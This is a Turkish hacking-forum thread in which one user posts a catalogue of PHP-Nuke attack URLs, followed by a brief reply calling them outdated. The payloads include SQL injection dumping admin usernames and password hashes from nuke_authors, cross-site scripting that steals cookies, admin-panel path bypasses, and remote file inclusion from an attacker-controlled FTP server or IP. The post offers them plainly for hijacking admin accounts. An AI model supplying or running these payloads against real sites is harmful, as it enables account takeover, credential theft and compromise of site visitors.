php nuke açıkları

cartman

Katılımcı Üye
28 Ara 2005
932
10
zBjk
önizleme moduna saldırı
Kod:
http://www.siteninadı.com/phpnukeyolu/modules.php?name=Reviews&rop=Yes&title=f001&text=f002&score=9&[email protected]&reviewer=f00&score=9999
Kod:
http://www.siteninadı.com/phpnuke yolu/modules.php?name=Reviews&rop=savecomment&id=1&uname=f00bar&score=999999999999999999999999
sistemden cookie çalma bu yolla admin gibi login olabilirsiniz yada md5 hash ini crackliyebilirsiniz
Kod:
http://www.siteninadı.com/phpnukeyolu/modules.php?name=Reviews&rop=postcomment&id='&title=ahttp://www.siteninadı.com/phpnukeyolu/modules.php?name=Reviews&rop=postcomment&id='&title=a[/URL]
bu kod çalışmazsa geri tuşuna basın bidaha ileri tuşuna basın karşınıza admin id si ile md5 hash i gelicektir
admin.php yoluna ulaşmak
Kod:
http://www.siteninadı.com/phpnukeyoluadmin/case/case.adminfaq.php/admin.php?op=FaqCatGo
http://www.siteninadı.com/phpnukeyolu/admin/admin.php/index.php
http://www.siteninadı.com/phpnukeyolu/admin/modules/blocks.php/admin.php
bu tehlikeli açıklardan biridir phpnuke portalına belirlediğinz dosyalar eklenir adam girdiğinde o dosya yada kod bilgisayarınıza iner oto çalıştırılabilir
Kod:
http://www.siteninadı.com/phpnukeyolu/index.php?modpath=ftp://ftpadresiniz.com/dizin/
http://www.siteninadı.com/phpnukeyolu/index.php?modpath=//saldırganın ip si/bilgisayardaki klasörün adı/
cross site scripting le önemli bilgilere ulaşmak cookie hash vs.vs
Kod:
http://wwwsiteninadı.com/nukeyolu/modules.php?name=Surveys&file=comments&op=Reply&pid=1&pollID=1&mode=thread&order=[xss
code here]&thold=0
http://www.siteninadı.com/nukeyolu/modules.php?name=Surveys&file=comments&op=Reply&pid=1&pollID=1&mode=thread&order=&thold=[xss
code here]
http://www.siteninadı.com/nukeyolu/index.php?foo=bar%20union%20select%20<script>alert(document.cookie);</scripthttp://www.siteninadı.com/nukeyolu/index.php?foo=bar%20union%20select%20<script>alert(document.cookie);</script[/URL]>
http://www.siteninadı.com/nukeyolu/modules.php?name=Web_Links&l_op=viewlink&cid=1&show=foobar
modules.php yardımıyla siteden bilgi çalma yönetim paneline login vs.vs
Kod:
http://www.siteninadı.com/nukeyolu/modules.php?name=Downloads&d_op=viewsdownload&sid=-1/**/UNION/**/SELECT/**/0,0,aid,pwd,0,0,0,0,0,0,0,0/**/FROM/**/nuke_authors/**/WHERE/**/radmins
uper=1/**/LIMIT/**/1/*
cookie ayıklama kodundaki hatadan kaynaklanaan sitede herhangi bir script çalıştırılması yada istenilen kişinin cookie aracılıyla hash inin bulunması
Kod:
http://siteninadı.com/nukeyolu/index.php?user=MTo8c2NyaXB0PmFsZXJ0KGRvY3VtZW50LmNvb2tpZSk7PC9zY3JpcHQ%2bZm9vYmFy

Saygılar...
 

serserialper21

Yeni üye
22 Eyl 2006
11
0
Diyarbaqır
eski acıklar çok nedir bulunudur su an en guncen sql injeksıyon paylasımın için saol bunlar 7.4 surumlerinden once vardı su an son olarak 8.0 bile cıktı
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.